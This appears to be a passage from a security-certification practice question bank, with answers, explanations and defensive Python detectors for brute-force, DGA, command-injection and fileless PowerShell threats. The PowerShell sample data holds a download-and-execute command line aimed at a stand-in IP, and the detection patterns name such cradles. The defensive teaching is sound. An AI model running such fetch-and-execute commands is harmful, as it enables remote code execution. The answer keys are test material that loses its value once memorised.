Question 176
A SOC analyst observes a sudden surge in failed login attempts targeting multiple administrative accounts from external IP addresses. Usernames follow predictable patterns, and attempts are occurring at a very high frequency. Which of the following BEST describes the threat?
A) Brute-force attack targeting user credentials
B) Fileless malware using living-off-the-land techniques
C) Distributed denial-of-service (DDoS) attack
D) Phishing emails delivering malicious attachments
Answer A
Explanation:
A Brute-force attack targeting user credentials
This scenario exemplifies a brute-force attack, a method in which an attacker systematically attempts numerous combinations of usernames and passwords to gain unauthorized access to systems or accounts. The repeated failed login attempts targeting multiple administrative accounts with predictable usernames strongly indicate the use of automated attack tools or scripts, rather than sporadic human error.
Brute-force attacks are often distributed across multiple IP addresses via botnets, allowing attackers to circumvent IP-based rate-limiting and enhance the speed and effectiveness of their attacks. Such campaigns target weak, default, or reused passwords and are particularly dangerous when targeting high-privilege accounts, as successful compromise can enable attackers to escalate privileges, move laterally across networks, deploy malware, or exfiltrate sensitive data.
Detection requires layered monitoring and analytics. Security information and event management (SIEM) solutions aggregate authentication logs to detect patterns of failed login attempts, unusual geolocation access, or off-hours activity. Advanced analytics and machine learning can highlight abnormal authentication behavior and correlate attempts across accounts and systems to identify ongoing brute-force campaigns.
Mitigation involves a combination of technical and procedural controls. Account lockout policies temporarily disable accounts after a predefined number of failed attempts, reducing the effectiveness of automated attacks. Multi-factor authentication (MFA) introduces additional verification factors beyond passwords, mitigating the risk even if credentials are compromised. Rate-limiting login attempts at the application or network level slows the attack, providing analysts with critical detection and response time.
Additional preventive measures include enforcing strong password policies, rotating credentials regularly, conducting user training on secure password practices, and integrating threat intelligence feeds to block IP addresses associated with known brute-force campaigns. Combined, these strategies significantly reduce the likelihood of successful credential compromise and strengthen overall security posture.
B Fileless malware using living-off-the-land techniques
Fileless malware executes in memory using legitimate system tools such as PowerShell or WMI. It does not cause repeated login failures across multiple accounts, making this option inconsistent with the observed behavior.
C Distributed denial-of-service (DDoS) attack
DDoS attacks aim to overwhelm systems and degrade availability rather than systematically attempting credential compromise.
D Phishing emails delivering malicious attachments
Phishing relies on user interaction to deliver malware or harvest credentials. Automated login attempts across multiple accounts are not consistent with phishing campaigns.
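The SIEM-style detection described above, as an added example that is not part of the original question set: it parses constructed sshd-style failed-login lines, flags any source IP that fails against several distinct accounts inside a short window, and scores how "guessable" the targeted usernames look. The log format, thresholds and regex are assumptions for the example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log lines (not taken from the page).
SAMPLE_LOG = """\
2024-05-01T02:00:01 sshd[1201]: Failed password for invalid user admin from 203.0.113.5 port 50211 ssh2
2024-05-01T02:00:02 sshd[1202]: Failed password for invalid user admin1 from 203.0.113.5 port 50212 ssh2
2024-05-01T02:00:02 sshd[1203]: Failed password for invalid user admin2 from 203.0.113.5 port 50213 ssh2
2024-05-01T02:00:03 sshd[1204]: Failed password for root from 203.0.113.5 port 50214 ssh2
2024-05-01T02:00:03 sshd[1205]: Failed password for administrator from 198.51.100.7 port 40001 ssh2
2024-05-01T02:00:04 sshd[1206]: Failed password for invalid user admin3 from 198.51.100.7 port 40002 ssh2
2024-05-01T02:00:05 sshd[1207]: Failed password for invalid user admin4 from 203.0.113.5 port 50215 ssh2
2024-05-01T02:00:06 sshd[1208]: Failed password for invalid user admin5 from 203.0.113.5 port 50216 ssh2
2024-05-01T09:15:00 sshd[1300]: Failed password for jsmith from 10.0.0.12 port 61000 ssh2
2024-05-01T09:15:20 sshd[1301]: Accepted password for jsmith from 10.0.0.12 port 61001 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) sshd\[\d+\]: (?P<result>Failed|Accepted) password for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)
# Names typically guessed from a wordlist rather than read from a real directory.
PREDICTABLE_RE = re.compile(r"^(?:admin(?:istrator)?\d*|root|test\d*|guest)$", re.I)

def parse(log_text):
    """Return (timestamp, result, user, ip) tuples for every line the regex recognises."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            events.append((datetime.fromisoformat(m["ts"]), m["result"], m["user"], m["ip"]))
    return events

def find_bruteforce(events, window=timedelta(minutes=1), min_failures=5, min_users=3):
    """Flag source IPs with >= min_failures failures against >= min_users distinct
    accounts inside any `window`. One user mistyping a password never trips this;
    an automated tool cycling through admin-style names in seconds does."""
    fails = defaultdict(list)
    for ts, result, user, ip in events:
        if result == "Failed":
            fails[ip].append((ts, user))
    flagged = {}
    for ip, attempts in fails.items():
        attempts.sort()
        for i, (start, _) in enumerate(attempts):
            burst = [u for ts, u in attempts[i:] if ts - start <= window]
            if len(burst) >= min_failures and len(set(burst)) >= min_users:
                flagged[ip] = sorted(set(burst))  # distinct accounts targeted in the burst
                break
    return flagged

def predictable_share(usernames):
    """Fraction of targeted names matching the guessable pattern; near 1.0 supports the verdict."""
    return sum(bool(PREDICTABLE_RE.match(u)) for u in usernames) / len(usernames)
```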
Question 177
An analyst observes abnormal outbound traffic from a host to unknown external IP addresses over high-numbered ports. DNS logs indicate frequent queries to pseudo-randomly generated domains. Which of the following BEST describes this activity?
A) Malware using a domain generation algorithm (DGA) for command-and-control
B) Routine software update traffic
C) Distributed denial-of-service (DDoS) attack
D) Misconfigured internal monitoring system
Answer A
Explanation:
A Malware using a domain generation algorithm (DGA) for command-and-control
The combination of outbound connections over high-numbered ports and frequent DNS queries to pseudo-randomly generated domains strongly indicates malware leveraging a domain generation algorithm (DGA) to maintain command-and-control (C2) communication. DGAs dynamically generate domain names to allow malware to contact its C2 infrastructure even if certain domains are blocked or taken down.
DGAs are widely employed by advanced persistent threat (APT) groups and sophisticated malware families. This technique allows attackers to maintain resilient, covert communication channels with infected hosts, evading signature-based security tools. Indicators of DGA activity include high-entropy domains, repeated failed DNS resolutions, outbound connections over uncommon ports, and anomalous network traffic patterns.
Detection strategies involve correlating DNS and network traffic logs, monitoring endpoint telemetry, and employing behavioral analytics. Machine learning models can detect unusual DNS query patterns, high entropy, and anomalous query frequency indicative of DGA behavior. Reverse-engineering the malware or its DGA allows defenders to predict future domains and proactively block them.
Mitigation requires isolating compromised hosts to prevent further spread, blocking malicious domains and IP addresses, eradicating malware, and performing forensic analysis to determine the infection vector. Integration of threat intelligence feeds can provide actionable indicators of compromise (IOCs), including known malware families, domains, and C2 techniques. Defense-in-depth measures such as network segmentation, egress filtering, application whitelisting, endpoint detection and response (EDR), and user education enhance the organization’s resilience against DGA-enabled malware.
B Routine software update traffic
Legitimate software updates connect to known servers using standard ports. Randomized domain queries with high frequency are inconsistent with normal update behavior.
C Distributed denial-of-service (DDoS) attack
DDoS attacks aim to overwhelm system resources to disrupt availability and do not establish covert communications with C2 infrastructure.
D Misconfigured internal monitoring system
While misconfigurations may generate abnormal traffic, they rarely result in frequent queries to pseudo-random domains combined with outbound connections to unknown external IPs.
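The DGA indicators listed above (high-entropy labels, repeated NXDOMAIN answers, many distinct names from one client) implemented as a small correlation over constructed resolver log lines. This is an added example, not code from the page; the log format, entropy threshold and ratios are assumptions chosen for illustration.

```python
import math
from collections import defaultdict

# Constructed resolver log (not from the page): "<timestamp> <client> <qname> <rcode>".
SAMPLE_DNS = """\
2024-05-01T03:10:01 10.0.0.23 xk3q9vz1ptmwn.com NXDOMAIN
2024-05-01T03:10:01 10.0.0.23 r8dhwq2lsbv0a.net NXDOMAIN
2024-05-01T03:10:02 10.0.0.23 m4tzq0pyx7hgc.org NXDOMAIN
2024-05-01T03:10:02 10.0.0.23 wv9jkq2nzt5r.info NXDOMAIN
2024-05-01T03:10:03 10.0.0.23 b7xq1mdzk0wus.com NXDOMAIN
2024-05-01T03:10:03 10.0.0.23 q2lpx9vmz8ytd.com NOERROR
2024-05-01T03:10:04 10.0.0.23 update.example.com NOERROR
2024-05-01T03:11:00 10.0.0.41 www.example.com NOERROR
2024-05-01T03:11:01 10.0.0.41 mail.example.com NOERROR
2024-05-01T03:11:02 10.0.0.41 cdn.example.net NOERROR
2024-05-01T03:11:03 10.0.0.41 typo.exampel.com NXDOMAIN
"""

def shannon_entropy(s):
    """Bits per character. Generated labels built from a near-uniform alphabet score
    high (about 3.3 and up); dictionary-word labels score well below that."""
    if not s:
        return 0.0
    counts = {c: s.count(c) for c in set(s)}
    return -sum(n / len(s) * math.log2(n / len(s)) for n in counts.values())

def registered_label(qname):
    """Second-level label, e.g. 'xk3q9vz1ptmwn' from 'xk3q9vz1ptmwn.com'.
    Simplification: multi-part public suffixes such as co.uk are not handled."""
    parts = qname.rstrip(".").split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]

def score_clients(log_text, entropy_threshold=3.3, min_suspect=5, nx_ratio=0.5):
    """Per client, count distinct high-entropy labels and the NXDOMAIN ratio. A client is
    flagged only when both are high: DGA malware queries many generated names and most
    fail to resolve because the operator registers only a few of them."""
    stats = defaultdict(lambda: {"queries": 0, "nxdomain": 0, "high_entropy": set()})
    for line in log_text.splitlines():
        _ts, client, qname, rcode = line.split()
        st = stats[client]
        st["queries"] += 1
        st["nxdomain"] += rcode == "NXDOMAIN"
        label = registered_label(qname)
        if len(label) >= 10 and shannon_entropy(label) >= entropy_threshold:
            st["high_entropy"].add(label)
    flagged = {}
    for client, st in stats.items():
        ratio = st["nxdomain"] / st["queries"]
        if len(st["high_entropy"]) >= min_suspect and ratio >= nx_ratio:
            flagged[client] = {"suspect_domains": len(st["high_entropy"]),
                               "nxdomain_ratio": round(ratio, 2)}
    return flagged
```

Flagged clients are candidates for the isolation and forensic steps described in the explanation; the entropy test alone would also catch CDN or cloud-storage hostnames, which is why the NXDOMAIN ratio is required as well.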
Question 178
A security audit identifies multiple privileged service accounts that have not been used for over six months but still retain administrative privileges. Which control would MOST effectively mitigate this risk?
A) Implement automated account deprovisioning
B) Increase password complexity requirements for service accounts
C) Disable all external SSH access
D) Deploy full disk encryption on endpoints
Answer A
Explanation:
A Implement automated account deprovisioning
Dormant privileged accounts are high-risk because attackers can exploit them for unauthorized access, lateral movement, and persistence within networks. Automated account deprovisioning ensures that accounts are disabled or removed after a predefined period of inactivity, minimizing the attack surface and enforcing the principle of least privilege.
Integration with identity governance and privileged access management (PAM) systems ensures consistent policy enforcement, auditing, and compliance with regulatory standards such as PCI DSS, HIPAA, and SOX. Manual deprovisioning is prone to human error, leaving dormant accounts vulnerable, whereas automation provides timely, consistent, and auditable removal of inactive accounts.
Complementary controls include multi-factor authentication (MFA), role-based access control (RBAC), periodic privilege recertification, and continuous monitoring of account activity. Logging attempts to access deprovisioned accounts can detect insider threats or attempted compromise. Automated account deprovisioning not only reduces operational risk but also enhances overall security posture by eliminating high-privilege accounts that are unnecessary or inactive.
B Increase password complexity requirements for service accounts
While strong passwords mitigate the risk of brute-force attacks, they do not reduce the inherent risk posed by dormant privileged accounts.
C Disable all external SSH access
Restricting SSH access reduces exposure to external attacks but does not mitigate risks associated with unused administrative accounts.
D Deploy full disk encryption on endpoints
Encryption protects data at rest but does not address the risks of dormant privileged accounts.
Question 179
During a penetration test, testers exploit unsanitized web input fields allowing operating system-level command execution. Which control BEST mitigates this vulnerability?
A) Server-side input validation with parameterized commands
B) Enforce TLS encryption for all web traffic
C) Increase session timeout values
D) Add additional firewall rules at the perimeter
Answer A
Explanation:
A Server-side input validation with parameterized commands
Command injection vulnerabilities occur when applications fail to validate user input, allowing arbitrary OS-level commands to execute. Server-side input validation ensures input matches expected types, lengths, and formats, while parameterized commands or prepared statements separate user input from executable code, preventing injection attacks.
Secure coding practices, including input validation, output encoding, and secure framework usage, reduce application-layer vulnerabilities. Static application security testing (SAST) and dynamic application security testing (DAST) identify vulnerabilities during development. Web application firewalls (WAFs) provide an additional layer by filtering requests matching known attack signatures.
Monitoring and logging anomalous input attempts provide early detection. Remediation involves code updates, secure coding training for developers, and periodic penetration testing. TLS encryption ensures data in transit is secure but does not prevent injection. Session timeout policies reduce the risk of session hijacking but do not prevent command injection. Network firewalls cannot inspect application-layer input effectively, making server-side input validation with parameterized commands the most effective mitigation strategy.
B Enforce TLS encryption for all web traffic
TLS ensures secure transmission of data but does not prevent command injection vulnerabilities.
C Increase session timeout values
Session timeout values only govern session management; they do not address input validation or command injection risks.
D Add additional firewall rules at the perimeter
Firewalls cannot inspect application-layer input effectively, making them ineffective against command injection.
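The mitigation chosen in Questions 174 and 179, shown as an added example that is not part of the original page: a command built by interpolating raw input into a shell string beside the hardened form, which validates the input server-side against an allow-list pattern and passes it to the OS as a separate argument with no shell involved. The hostname regex, the ping use case and the rejection log are assumptions for the example.

```python
import re
import subprocess

# RFC 1123-style hostname allow-list: labels of letters, digits and interior hyphens only.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)*"
    r"[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?$", re.I)

# Stand-in for the validation-failure log the page recommends forwarding to monitoring.
REJECTED_INPUTS = []

class ValidationError(ValueError):
    pass

def validate_hostname(value):
    """Server-side validation: anything that is not a plain hostname (whitespace,
    shell metacharacters, a leading '-', empty input) is rejected and logged."""
    if not isinstance(value, str) or not HOSTNAME_RE.match(value):
        REJECTED_INPUTS.append(value)
        raise ValidationError(f"rejected input: {value!r}")
    return value

def is_accepted(value):
    try:
        validate_hostname(value)
        return True
    except ValidationError:
        return False

def build_ping_command_vulnerable(host):
    # Vulnerable pattern: unvalidated input becomes part of a shell command string.
    # Run with shell=True, the shell interprets any metacharacters the input carries.
    return f"ping -c 1 {host}"

def build_ping_command(host):
    """Hardened form: validated input travels as one argv element, so the kernel hands
    it to ping as a literal argument and no shell ever parses it."""
    return ["ping", "-c", "1", validate_hostname(host)]

def run_ping(host, timeout=5):
    """Execute the hardened command without a shell; returns the process exit code."""
    argv = build_ping_command(host)
    return subprocess.run(argv, capture_output=True, text=True, timeout=timeout).returncode
```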
Question 180
A SOC analyst observes obfuscated PowerShell scripts executing on endpoints and communicating with unknown external IP addresses. Antivirus scans detect no malicious files. Which threat BEST describes this activity?
A) Fileless malware leveraging living-off-the-land techniques
B) Standard ransomware encrypting files
C) Phishing emails delivering malicious attachments
D) Distributed denial-of-service (DDoS) attack
Answer A
Explanation:
A Fileless malware leveraging living-off-the-land techniques
Fileless malware operates primarily in memory, leveraging legitimate system tools such as PowerShell, WMI, or Office macros to execute malicious actions. Obfuscated scripts communicating with external IPs without leaving files on disk are indicative of living-off-the-land malware, designed to evade signature-based antivirus solutions.
Detection relies on behavioral monitoring, endpoint detection and response (EDR), and memory analysis. Indicators include anomalous script execution, unusual outbound connections, and deviations from baseline system activity. Mitigation includes isolating affected endpoints, terminating malicious processes, analyzing scripts, and remediating systems.
Preventive measures include least privilege enforcement, application whitelisting, PowerShell logging, script block logging, execution policy enforcement, and integration of threat intelligence feeds to block malicious domains. Defense-in-depth strategies combining monitoring, anomaly detection, user training, and structured incident response are critical to mitigating fileless malware.
Unlike ransomware, phishing, or DDoS attacks, fileless malware does not create files on disk, instead operating in memory and using legitimate tools to persist, evade detection, and maintain control of compromised systems.
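The behavioral detection that Questions 175 and 180 call for, as an added example rather than code from the page: it scores constructed PowerShell process-creation records (the kind an EDR, Sysmon Event ID 1 or Windows 4688 feed delivers) against living-off-the-land indicators such as encoded or hidden execution, policy bypass and download cradles, and decodes any -EncodedCommand payload so an analyst can triage it. The sample events, indicator weights and threshold are assumptions; the encoded payload is a harmless Write-Output built inline.

```python
import base64
import re

# Constructed sample events (not from the page). The base64 payload is generated here so the
# sample is reproducible; PowerShell expects -EncodedCommand to be base64 of UTF-16LE text.
_ENC = base64.b64encode("Write-Output 'test'".encode("utf-16le")).decode()
SAMPLE_EVENTS = [
    {"host": "WS-0142", "user": "CORP\\jdoe",
     "cmd": f"powershell.exe -NoProfile -NonInteractive -WindowStyle Hidden -EncodedCommand {_ENC}"},
    {"host": "WS-0142", "user": "CORP\\jdoe",
     "cmd": "powershell.exe -ep bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.9:8080/a')\""},
    {"host": "WS-0077", "user": "CORP\\svc-backup",
     "cmd": "powershell.exe -File C:\\Scripts\\nightly-backup.ps1"},
    {"host": "WS-0091", "user": "CORP\\asmith",
     "cmd": "powershell.exe -Command Get-Service -Name Spooler"},
]

# (name, pattern, weight); weights are illustrative, not a vendor scoring scheme.
INDICATORS = [
    ("encoded_command", re.compile(r"-(?:e|ec|enc|encodedcommand)\s", re.I), 3),
    ("hidden_window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), 2),
    ("bypass_policy", re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.I), 2),
    ("download_cradle", re.compile(r"downloadstring|downloadfile|invoke-webrequest|iwr\b", re.I), 3),
    ("invoke_expression", re.compile(r"\biex\b|invoke-expression", re.I), 3),
    ("ip_literal_url", re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}", re.I), 2),
]

def decode_encoded_command(cmd):
    """Return the plaintext behind -EncodedCommand, or None if absent or undecodable."""
    m = re.search(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", cmd, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None

def score_event(event, threshold=4):
    """Sum the weights of matching indicators; the event is suspicious at or above threshold.
    A single weak indicator (hidden window alone) stays below it to limit false positives."""
    hits = [name for name, rx, _ in INDICATORS if rx.search(event["cmd"])]
    score = sum(w for name, _, w in INDICATORS if name in hits)
    return {"host": event["host"], "score": score, "hits": hits,
            "decoded": decode_encoded_command(event["cmd"]), "suspicious": score >= threshold}

def triage(events):
    """Return only the suspicious events, ready for the isolation and analysis steps above."""
    return [r for r in (score_event(e) for e in events) if r["suspicious"]]
```

Scheduled scripts and routine cmdlets score zero here, which is the point of behavioral scoring: the legitimate tool is the same, so the telemetry around its invocation has to carry the verdict.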